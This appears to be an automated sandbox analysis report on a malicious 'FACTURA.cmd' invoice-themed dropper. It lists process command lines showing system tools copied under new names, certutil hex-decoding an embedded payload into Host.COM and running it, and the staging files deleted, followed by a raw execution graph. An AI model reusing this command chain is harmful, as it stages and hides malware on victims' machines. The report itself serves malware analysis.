                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:22:29:13
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FACTURA.cmd" "
                                                                                    Imagebase:0x7ff7985a0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:22:29:13
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:22:29:13
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Windows\System32\extrac32.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                                                                    Imagebase:0x7ff6fc9d0000
                                                                                    File size:35'328 bytes
                                                                                    MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:22:29:13
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Users\Public\alpha.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                    Imagebase:0x7ff793740000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    • Detection: 0%, Virustotal, Browse
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:22:29:13
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Windows\System32\extrac32.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                    Imagebase:0x7ff6fc9d0000
                                                                                    File size:35'328 bytes
                                                                                    MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:22:29:14
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Users\Public\alpha.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3
                                                                                    Imagebase:0x7ff793740000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:22:29:14
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Users\Public\kn.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3
                                                                                    Imagebase:0x7ff7e0790000
                                                                                    File size:1'651'712 bytes
                                                                                    MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    • Detection: 0%, Virustotal, Browse
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:22:29:15
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Users\Public\alpha.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
                                                                                    Imagebase:0x7ff793740000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:8
                                                                                    Start time:22:29:15
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Users\Public\kn.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
                                                                                    Imagebase:0xbe0000
                                                                                    File size:1'651'712 bytes
                                                                                    MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:9
                                                                                    Start time:22:29:16
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Users\Public\Libraries\Host.COM
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\Public\Libraries\Host.COM
                                                                                    Imagebase:0x400000
                                                                                    File size:1'483'264 bytes
                                                                                    MD5 hash:320D5ED383D73182150A145823610493
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:Borland Delphi
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 51%, Virustotal, Browse
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:10
                                                                                    Start time:22:29:16
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Users\Public\alpha.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                                                                                    Imagebase:0x7ff793740000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:11
                                                                                    Start time:22:29:16
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Users\Public\alpha.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S
                                                                                    Imagebase:0x7ff793740000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:5.5%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:35.1%
                                                                                      Total number of Nodes:781
                                                                                      Total number of Limit Nodes:21
                                                                                      execution_graph 18624 7ff79374b8c0 18627 7ff79374be00 18624->18627 18628 7ff79374b8d4 18627->18628 18629 7ff79374be1b 18627->18629 18629->18628 18630 7ff79374be67 18629->18630 18631 7ff79374be47 memset 18629->18631 18632 7ff79374be73 18630->18632 18635 7ff79374bf29 18630->18635 18636 7ff79374beaf 18630->18636 18734 7ff79374bff0 18631->18734 18634 7ff79374be92 18632->18634 18638 7ff79374bf0c 18632->18638 18644 7ff79374bea1 18634->18644 18661 7ff79374c620 GetConsoleTitleW 18634->18661 18637 7ff79374cd90 166 API calls 18635->18637 18636->18628 18642 7ff79374bff0 185 API calls 18636->18642 18640 7ff79374bf33 18637->18640 18772 7ff79374b0d8 memset 18638->18772 18640->18636 18645 7ff79374bf70 18640->18645 18648 7ff7937488a8 _wcsicmp 18640->18648 18642->18628 18644->18636 18650 7ff79374af98 2 API calls 18644->18650 18655 7ff79374bf75 18645->18655 18885 7ff7937471ec 18645->18885 18646 7ff79374bf1e 18646->18636 18649 7ff79374bf5a 18648->18649 18649->18645 18832 7ff793750a6c 18649->18832 18650->18636 18651 7ff79374bfa9 18651->18636 18653 7ff79374cd90 166 API calls 18651->18653 18654 7ff79374bfbb 18653->18654 18654->18636 18656 7ff79375081c 166 API calls 18654->18656 18657 7ff79374b0d8 194 API calls 18655->18657 18656->18655 18658 7ff79374bf7f 18657->18658 18658->18636 18705 7ff793755ad8 18658->18705 18663 7ff79374c675 18661->18663 18698 7ff79374ca2f 18661->18698 18662 7ff79375c5fc GetLastError 18662->18698 18664 7ff79374ca40 17 API calls 18663->18664 18672 7ff79374c69b 18664->18672 18665 7ff793743278 166 API calls 18665->18698 18666 7ff79375855c ??_V@YAXPEAX 18666->18698 18667 7ff79374c9b5 18671 7ff79375855c ??_V@YAXPEAX 18667->18671 18668 7ff7937489c0 23 API calls 18696 7ff79374c964 18668->18696 18669 7ff79374c978 towupper 18669->18696 18670 7ff79375855c ??_V@YAXPEAX 18689 7ff79374c762 18670->18689 18690 7ff79374c855 18671->18690 18672->18667 18673 7ff79374d3f0 223 API calls 18672->18673 18672->18689 18672->18698 18675 7ff79374c741 18673->18675 18674 7ff79376ec14 173 API calls 18674->18689 18677 7ff79374c74d 18675->18677 18680 7ff79374c8b5 wcsncmp 18675->18680 18676 7ff79374c872 18678 7ff79375855c ??_V@YAXPEAX 18676->18678 18682 7ff79374bd38 207 API calls 18677->18682 18677->18689 18681 7ff79374c87c 18678->18681 18679 7ff79375c6b8 SetConsoleTitleW 18679->18676 18680->18677 18680->18689 18683 7ff793758f80 7 API calls 18681->18683 18682->18689 18686 7ff79374c88e 18683->18686 18684 7ff79374c83d 18891 7ff79374cb40 18684->18891 18686->18644 18687 7ff79374c78a wcschr 18687->18689 18689->18670 18689->18684 18689->18687 18691 7ff79374ca25 18689->18691 18692 7ff79375291c 8 API calls 18689->18692 18694 7ff79375c684 18689->18694 18689->18696 18689->18698 18699 7ff79374ca2a 18689->18699 18690->18676 18690->18679 18695 7ff793743278 166 API calls 18691->18695 18692->18689 18697 7ff793743278 166 API calls 18694->18697 18695->18698 18696->18662 18696->18667 18696->18668 18696->18669 18696->18674 18696->18689 18701 7ff79374ca16 GetLastError 18696->18701 18697->18698 18698->18662 18698->18665 18698->18666 18700 7ff793759158 7 API calls 18699->18700 18700->18698 18703 7ff793743278 166 API calls 18701->18703 18704 7ff79375c675 18703->18704 18704->18698 18706 7ff79374cd90 166 API calls 18705->18706 18707 7ff793755b12 18706->18707 18708 7ff79374cb40 166 API calls 18707->18708 18732 7ff793755b8b 18707->18732 18709 7ff793755b26 18708->18709 18712 7ff793750a6c 273 API calls 18709->18712 18709->18732 18710 7ff793758f80 7 API calls 18711 7ff79374bf99 18710->18711 18711->18644 18713 7ff793755b43 18712->18713 18714 7ff793755bb8 18713->18714 18715 7ff793755b48 GetConsoleTitleW 18713->18715 18716 7ff793755bbd GetConsoleTitleW 18714->18716 18717 7ff793755bf4 18714->18717 18718 7ff79374cad4 172 API calls 18715->18718 18719 7ff79374cad4 172 API calls 18716->18719 18720 7ff79375f452 18717->18720 18723 7ff793755bfd 18717->18723 18721 7ff793755b66 18718->18721 18722 7ff793755bdb 18719->18722 18725 7ff793753c24 166 API calls 18720->18725 18907 7ff793754224 InitializeProcThreadAttributeList 18721->18907 18971 7ff7937496e8 18722->18971 18727 7ff793755c1b 18723->18727 18728 7ff79375f462 18723->18728 18723->18732 18725->18732 18731 7ff793743278 166 API calls 18727->18731 18730 7ff793743278 166 API calls 18728->18730 18729 7ff793755b7f 18967 7ff793755c3c 18729->18967 18730->18732 18731->18732 18732->18710 18735 7ff79374c0c4 18734->18735 18736 7ff79374c01c 18734->18736 18735->18630 18737 7ff79374c086 18736->18737 18738 7ff79374c022 18736->18738 18742 7ff79374c144 18737->18742 18753 7ff79374c094 18737->18753 18739 7ff79374c113 18738->18739 18740 7ff79374c030 18738->18740 18751 7ff79374ff70 2 API calls 18739->18751 18755 7ff79374c053 18739->18755 18741 7ff79374c039 wcschr 18740->18741 18740->18755 18744 7ff79374c301 18741->18744 18741->18755 18743 7ff79374c151 18742->18743 18771 7ff79374c1c8 18742->18771 19297 7ff79374c460 18743->19297 18750 7ff79374cd90 166 API calls 18744->18750 18745 7ff79374c058 18757 7ff79374ff70 2 API calls 18745->18757 18759 7ff79374c073 18745->18759 18746 7ff79374c0c6 18749 7ff79374c0cf wcschr 18746->18749 18746->18759 18748 7ff79374c460 183 API calls 18748->18753 18754 7ff79374c1be 18749->18754 18749->18759 18767 7ff79374c30b 18750->18767 18751->18755 18753->18735 18753->18748 18756 7ff79374cd90 166 API calls 18754->18756 18755->18745 18755->18746 18761 7ff79374c211 18755->18761 18756->18771 18757->18759 18758 7ff79374c460 183 API calls 18758->18735 18759->18735 18760 7ff79374c460 183 API calls 18759->18760 18760->18759 18765 7ff79374ff70 2 API calls 18761->18765 18762 7ff79374c285 18762->18761 18766 7ff79374b6b0 170 API calls 18762->18766 18763 7ff79374b6b0 170 API calls 18763->18755 18764 7ff79374d840 178 API calls 18764->18767 18765->18735 18769 7ff79374c2ac 18766->18769 18767->18735 18767->18761 18767->18764 18770 7ff79374c3d4 18767->18770 18768 7ff79374d840 178 API calls 18768->18771 18769->18759 18769->18761 18770->18759 18770->18761 18770->18763 18771->18735 18771->18761 18771->18762 18771->18768 18773 7ff79374ca40 17 API calls 18772->18773 18780 7ff79374b162 18773->18780 18774 7ff79374b1d9 18779 7ff79374cd90 166 API calls 18774->18779 18799 7ff79374b1ed 18774->18799 18775 7ff79374b2f7 ??_V@YAXPEAX 18776 7ff79374b303 18775->18776 18778 7ff793758f80 7 API calls 18776->18778 18777 7ff793751ea0 8 API calls 18777->18780 18781 7ff79374b315 18778->18781 18779->18799 18780->18774 18780->18777 18806 7ff79374b2e1 18780->18806 18781->18634 18781->18646 18783 7ff79374b228 _get_osfhandle 18785 7ff79374b23f _get_osfhandle 18783->18785 18783->18799 18784 7ff79375bfef _get_osfhandle SetFilePointer 18786 7ff79375c01d 18784->18786 18784->18799 18785->18799 18788 7ff7937533f0 _vsnwprintf 18786->18788 18790 7ff79375c038 18788->18790 18789 7ff7937501b8 6 API calls 18789->18799 18795 7ff793743278 166 API calls 18790->18795 18791 7ff79375c1c3 18793 7ff7937533f0 _vsnwprintf 18791->18793 18792 7ff7937526e0 19 API calls 18792->18799 18793->18790 18794 7ff79374d208 _close 18794->18799 18797 7ff79375c1f9 18795->18797 18796 7ff79375c060 18800 7ff79375c246 18796->18800 18804 7ff7937509f4 2 API calls 18796->18804 18802 7ff79374af98 2 API calls 18797->18802 18798 7ff79374b038 _dup2 18798->18799 18799->18783 18799->18784 18799->18789 18799->18791 18799->18792 18799->18794 18799->18796 18799->18798 18799->18800 18801 7ff79375c1a5 18799->18801 18799->18806 18807 7ff79374b356 18799->18807 19311 7ff79374affc _dup 18799->19311 19313 7ff79376f318 _get_osfhandle GetFileType 18799->19313 18805 7ff79374af98 2 API calls 18800->18805 18803 7ff79374b038 _dup2 18801->18803 18802->18806 18808 7ff79375c1b7 18803->18808 18809 7ff79375c084 18804->18809 18810 7ff79375c24b 18805->18810 18806->18775 18806->18776 18816 7ff79374af98 2 API calls 18807->18816 18811 7ff79375c1be 18808->18811 18812 7ff79375c207 18808->18812 18813 7ff79374b900 166 API calls 18809->18813 18814 7ff79376f1d8 166 API calls 18810->18814 18817 7ff79374d208 _close 18811->18817 18815 7ff79374d208 _close 18812->18815 18818 7ff79375c08c 18813->18818 18814->18806 18815->18807 18819 7ff79375c211 18816->18819 18817->18791 18820 7ff79375c094 wcsrchr 18818->18820 18830 7ff79375c0ad 18818->18830 18821 7ff7937533f0 _vsnwprintf 18819->18821 18820->18830 18822 7ff79375c22c 18821->18822 18823 7ff793743278 166 API calls 18822->18823 18823->18806 18824 7ff79375c106 18826 7ff79374ff70 2 API calls 18824->18826 18825 7ff79375c0e0 _wcsnicmp 18825->18830 18827 7ff79375c13b 18826->18827 18827->18800 18828 7ff79375c146 SearchPathW 18827->18828 18828->18800 18829 7ff79375c188 18828->18829 18831 7ff7937526e0 19 API calls 18829->18831 18830->18824 18830->18825 18831->18801 18833 7ff793751ea0 8 API calls 18832->18833 18834 7ff793750ab9 18833->18834 18835 7ff793750b12 memset 18834->18835 18836 7ff793750aee _wcsnicmp 18834->18836 18837 7ff79375d927 18834->18837 18844 7ff79375128f ??_V@YAXPEAX 18834->18844 18838 7ff79374ca40 17 API calls 18835->18838 18836->18835 18836->18837 18840 7ff79375081c 166 API calls 18837->18840 18839 7ff793750b5a 18838->18839 18842 7ff79374b364 17 API calls 18839->18842 18854 7ff79375d94e 18839->18854 18841 7ff79375d933 18840->18841 18841->18835 18841->18844 18862 7ff793750b6f 18842->18862 18843 7ff79375d96b ??_V@YAXPEAX 18843->18854 18845 7ff793750b8c wcschr 18845->18862 18848 7ff79375d99a wcschr 18848->18854 18849 7ff793750c0f wcsrchr 18849->18854 18849->18862 18850 7ff79375d9ca GetFileAttributesW 18851 7ff79375da64 18850->18851 18850->18854 18852 7ff79375081c 166 API calls 18852->18862 18853 7ff79375da90 GetFileAttributesW 18853->18854 18855 7ff79375daa8 GetLastError 18853->18855 18854->18843 18854->18848 18854->18850 18854->18851 18856 7ff79375d9fd ??_V@YAXPEAX 18854->18856 18855->18851 18857 7ff79375dab9 18855->18857 18856->18854 18857->18854 18858 7ff79374cd90 166 API calls 18858->18862 18859 7ff79374d3f0 223 API calls 18859->18862 18860 7ff793753060 171 API calls 18860->18862 18861 7ff793751ea0 8 API calls 18861->18862 18862->18844 18862->18845 18862->18849 18862->18852 18862->18854 18862->18858 18862->18859 18862->18860 18862->18861 18862->18862 18863 7ff79374af74 170 API calls 18862->18863 18864 7ff793750d71 wcsrchr 18862->18864 18866 7ff793750fb1 wcsrchr 18862->18866 18867 7ff79375291c 8 API calls 18862->18867 18868 7ff793750fd0 wcschr 18862->18868 18869 7ff793752eb4 22 API calls 18862->18869 18872 7ff7937510fd wcsrchr 18862->18872 18881 7ff793751087 _wcsicmp 18862->18881 18884 7ff79375da74 18862->18884 19314 7ff793753bac 18862->19314 19318 7ff793752efc 18862->19318 18863->18862 18864->18862 18865 7ff793750d97 NeedCurrentDirectoryForExePathW 18864->18865 18865->18854 18865->18862 18866->18862 18866->18868 18867->18862 18868->18851 18870 7ff793750fed wcschr 18868->18870 18869->18862 18870->18851 18870->18862 18872->18862 18873 7ff79375111a _wcsicmp 18872->18873 18874 7ff79375123d 18873->18874 18875 7ff793751138 _wcsicmp 18873->18875 18877 7ff793751175 18874->18877 18878 7ff793751250 ??_V@YAXPEAX 18874->18878 18875->18874 18876 7ff7937510c5 18875->18876 18876->18877 18879 7ff793751169 ??_V@YAXPEAX 18876->18879 18880 7ff793758f80 7 API calls 18877->18880 18878->18877 18879->18877 18882 7ff793751189 18880->18882 18883 7ff7937510a7 _wcsicmp 18881->18883 18881->18884 18882->18645 18883->18876 18883->18884 18884->18851 18884->18853 18886 7ff793747211 _setjmp 18885->18886 18890 7ff793747279 18885->18890 18888 7ff793747265 18886->18888 18886->18890 19332 7ff7937472b0 18888->19332 18890->18651 18892 7ff79374cb63 18891->18892 18893 7ff79374cd90 166 API calls 18892->18893 18894 7ff79374c848 18893->18894 18894->18690 18895 7ff79374cad4 18894->18895 18896 7ff79374cad9 18895->18896 18904 7ff79374cb05 18895->18904 18897 7ff79374cd90 166 API calls 18896->18897 18896->18904 18898 7ff79375c722 18897->18898 18899 7ff79375c72e GetConsoleTitleW 18898->18899 18898->18904 18900 7ff79375c74a 18899->18900 18899->18904 18901 7ff79374b6b0 170 API calls 18900->18901 18906 7ff79375c778 18901->18906 18902 7ff79375c7ec 18903 7ff79374ff70 2 API calls 18902->18903 18903->18904 18904->18690 18905 7ff79375c7dd SetConsoleTitleW 18905->18902 18906->18902 18906->18905 18908 7ff7937542ab UpdateProcThreadAttribute 18907->18908 18909 7ff79375ecd4 GetLastError 18907->18909 18910 7ff7937542eb memset memset GetStartupInfoW 18908->18910 18911 7ff79375ecf0 GetLastError 18908->18911 18912 7ff79375ecee 18909->18912 18914 7ff793753a90 170 API calls 18910->18914 19008 7ff793769eec 18911->19008 18916 7ff7937543a8 18914->18916 18917 7ff79374b900 166 API calls 18916->18917 18918 7ff7937543bb 18917->18918 18919 7ff7937543cc 18918->18919 18920 7ff793754638 _local_unwind 18918->18920 18921 7ff7937543de wcsrchr 18919->18921 18922 7ff793754415 18919->18922 18920->18919 18921->18922 18923 7ff7937543f7 lstrcmpW 18921->18923 18995 7ff793755a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 18922->18995 18923->18922 18926 7ff793754668 18923->18926 18925 7ff79375441a 18927 7ff79375442a CreateProcessW 18925->18927 18930 7ff793754596 CreateProcessAsUserW 18925->18930 18996 7ff793769044 18926->18996 18929 7ff79375448b 18927->18929 18931 7ff793754495 CloseHandle 18929->18931 18932 7ff793754672 GetLastError 18929->18932 18930->18929 18933 7ff79375498c 8 API calls 18931->18933 18940 7ff79375468d 18932->18940 18934 7ff7937544c5 18933->18934 18939 7ff7937544cd 18934->18939 18934->18940 18935 7ff7937547a3 18935->18729 18936 7ff7937544f8 18936->18935 18938 7ff793754612 18936->18938 18942 7ff793755cb4 7 API calls 18936->18942 18937 7ff79374cd90 166 API calls 18941 7ff793754724 18937->18941 18943 7ff79375461c 18938->18943 18945 7ff7937547e1 CloseHandle 18938->18945 18939->18935 18939->18936 18954 7ff79376a250 33 API calls 18939->18954 18940->18937 18940->18939 18944 7ff79375472c _local_unwind 18941->18944 18951 7ff79375473d 18941->18951 18946 7ff793754517 18942->18946 18947 7ff79374ff70 GetProcessHeap RtlFreeHeap 18943->18947 18944->18951 18945->18943 18948 7ff7937533f0 _vsnwprintf 18946->18948 18949 7ff7937547fa DeleteProcThreadAttributeList 18947->18949 18950 7ff793754544 18948->18950 18952 7ff793758f80 7 API calls 18949->18952 18953 7ff79375498c 8 API calls 18950->18953 18959 7ff79374ff70 GetProcessHeap RtlFreeHeap 18951->18959 18955 7ff793754820 18952->18955 18956 7ff793754558 18953->18956 18954->18936 18955->18729 18957 7ff7937547ae 18956->18957 18958 7ff793754564 18956->18958 18961 7ff7937533f0 _vsnwprintf 18957->18961 18960 7ff79375498c 8 API calls 18958->18960 18962 7ff79375475b _local_unwind 18959->18962 18963 7ff793754577 18960->18963 18961->18938 18962->18939 18963->18943 18964 7ff79375457f 18963->18964 18965 7ff79376a920 210 API calls 18964->18965 18966 7ff793754584 18965->18966 18966->18943 18968 7ff793755c4e 18967->18968 18969 7ff793755c45 18967->18969 18968->18732 18969->18968 18970 7ff79375f470 SetConsoleTitleW 18969->18970 18970->18968 18988 7ff793749737 18971->18988 18973 7ff79374977d memset 18975 7ff79374ca40 17 API calls 18973->18975 18974 7ff79374cd90 166 API calls 18974->18988 18975->18988 18976 7ff79375b7b3 18977 7ff79375b76e 18979 7ff793743278 166 API calls 18977->18979 18978 7ff79375b79a 18981 7ff79375855c ??_V@YAXPEAX 18978->18981 18982 7ff79375b787 18979->18982 18980 7ff79374b364 17 API calls 18980->18988 18981->18976 18983 7ff79375b795 18982->18983 19098 7ff79376e944 18982->19098 19106 7ff793767694 18983->19106 18988->18973 18988->18974 18988->18976 18988->18977 18988->18978 18988->18980 18988->18988 18990 7ff79374986d 18988->18990 19010 7ff793751fac memset 18988->19010 19037 7ff79374ce10 18988->19037 19087 7ff7937496b4 18988->19087 19092 7ff793755920 18988->19092 18991 7ff79374988c 18990->18991 18992 7ff793749880 ??_V@YAXPEAX 18990->18992 18993 7ff793758f80 7 API calls 18991->18993 18992->18991 18994 7ff79374989d 18993->18994 18994->18729 18997 7ff793753a90 170 API calls 18996->18997 18998 7ff793769064 18997->18998 18999 7ff79376906e 18998->18999 19000 7ff793769083 18998->19000 19001 7ff79375498c 8 API calls 18999->19001 19002 7ff79374cd90 166 API calls 19000->19002 19003 7ff793769081 19001->19003 19004 7ff79376909b 19002->19004 19003->18922 19004->19003 19005 7ff79375498c 8 API calls 19004->19005 19006 7ff7937690ec 19005->19006 19007 7ff79374ff70 2 API calls 19006->19007 19007->19003 19009 7ff79375ed0a DeleteProcThreadAttributeList 19008->19009 19009->18912 19011 7ff79375203b 19010->19011 19012 7ff7937520b0 19011->19012 19013 7ff793752094 19011->19013 19014 7ff793753060 171 API calls 19012->19014 19016 7ff79375211c 19012->19016 19015 7ff7937520a6 19013->19015 19017 7ff793743278 166 API calls 19013->19017 19014->19016 19019 7ff793758f80 7 API calls 19015->19019 19016->19015 19018 7ff793752e44 2 API calls 19016->19018 19017->19015 19021 7ff793752148 19018->19021 19020 7ff793752325 19019->19020 19020->18988 19021->19015 19022 7ff793752d70 3 API calls 19021->19022 19023 7ff7937521af 19022->19023 19024 7ff79374b900 166 API calls 19023->19024 19026 7ff7937521d0 19024->19026 19025 7ff79375e04a ??_V@YAXPEAX 19025->19015 19026->19025 19027 7ff79375221c wcsspn 19026->19027 19036 7ff7937522a4 ??_V@YAXPEAX 19026->19036 19029 7ff79374b900 166 API calls 19027->19029 19030 7ff79375223b 19029->19030 19030->19025 19033 7ff793752252 19030->19033 19031 7ff79374d3f0 223 API calls 19031->19036 19032 7ff79375e06d wcschr 19032->19033 19033->19032 19034 7ff79375e090 towupper 19033->19034 19035 7ff79375228f 19033->19035 19034->19033 19034->19035 19035->19031 19036->19015 19075 7ff79374d0f8 19037->19075 19083 7ff79374ce5b 19037->19083 19038 7ff793758f80 7 API calls 19041 7ff79374d10a 19038->19041 19039 7ff79375c860 19040 7ff79375c97c 19039->19040 19145 7ff79376ee88 19039->19145 19042 7ff79376e9b4 197 API calls 19040->19042 19041->18988 19045 7ff79375c981 longjmp 19042->19045 19047 7ff79375c99a 19045->19047 19051 7ff79375c9b3 ??_V@YAXPEAX 19047->19051 19047->19075 19048 7ff79375c95c 19048->19040 19054 7ff7937496b4 186 API calls 19048->19054 19049 7ff79375c882 EnterCriticalSection LeaveCriticalSection 19053 7ff79374d0e3 19049->19053 19051->19075 19052 7ff79374ceaa _tell 19055 7ff79374d208 _close 19052->19055 19053->18988 19054->19048 19055->19083 19056 7ff79374cd90 166 API calls 19056->19083 19057 7ff79375c9d5 19058 7ff79376d610 167 API calls 19057->19058 19060 7ff79375c9da 19058->19060 19059 7ff79374b900 166 API calls 19059->19083 19061 7ff79375ca07 19060->19061 19063 7ff79376bfec 176 API calls 19060->19063 19062 7ff79376e91c 198 API calls 19061->19062 19067 7ff79375ca0c 19062->19067 19064 7ff79375c9f1 19063->19064 19065 7ff793743240 166 API calls 19064->19065 19065->19061 19066 7ff79374cf33 memset 19066->19083 19067->18988 19068 7ff79374ca40 17 API calls 19068->19083 19069 7ff79374d184 wcschr 19069->19083 19070 7ff79376bfec 176 API calls 19070->19083 19071 7ff79375c9c9 19073 7ff79375855c ??_V@YAXPEAX 19071->19073 19072 7ff79374d1a7 wcschr 19072->19083 19073->19075 19075->19038 19076 7ff793750a6c 273 API calls 19076->19083 19077 7ff79374be00 635 API calls 19077->19083 19078 7ff793753448 166 API calls 19078->19083 19079 7ff79374cfab _wcsicmp 19079->19083 19080 7ff793750580 12 API calls 19081 7ff79374d003 GetConsoleOutputCP GetCPInfo 19080->19081 19082 7ff7937504f4 3 API calls 19081->19082 19082->19083 19083->19039 19083->19047 19083->19053 19083->19056 19083->19057 19083->19059 19083->19066 19083->19068 19083->19069 19083->19070 19083->19071 19083->19072 19083->19075 19083->19076 19083->19077 19083->19078 19083->19079 19083->19080 19085 7ff793751fac 238 API calls 19083->19085 19086 7ff79374d044 ??_V@YAXPEAX 19083->19086 19112 7ff793750494 19083->19112 19125 7ff79374df60 19083->19125 19181 7ff79376778c 19083->19181 19212 7ff79376c738 19083->19212 19085->19083 19086->19083 19088 7ff7937496c8 19087->19088 19089 7ff79375b6e2 RevertToSelf CloseHandle 19087->19089 19090 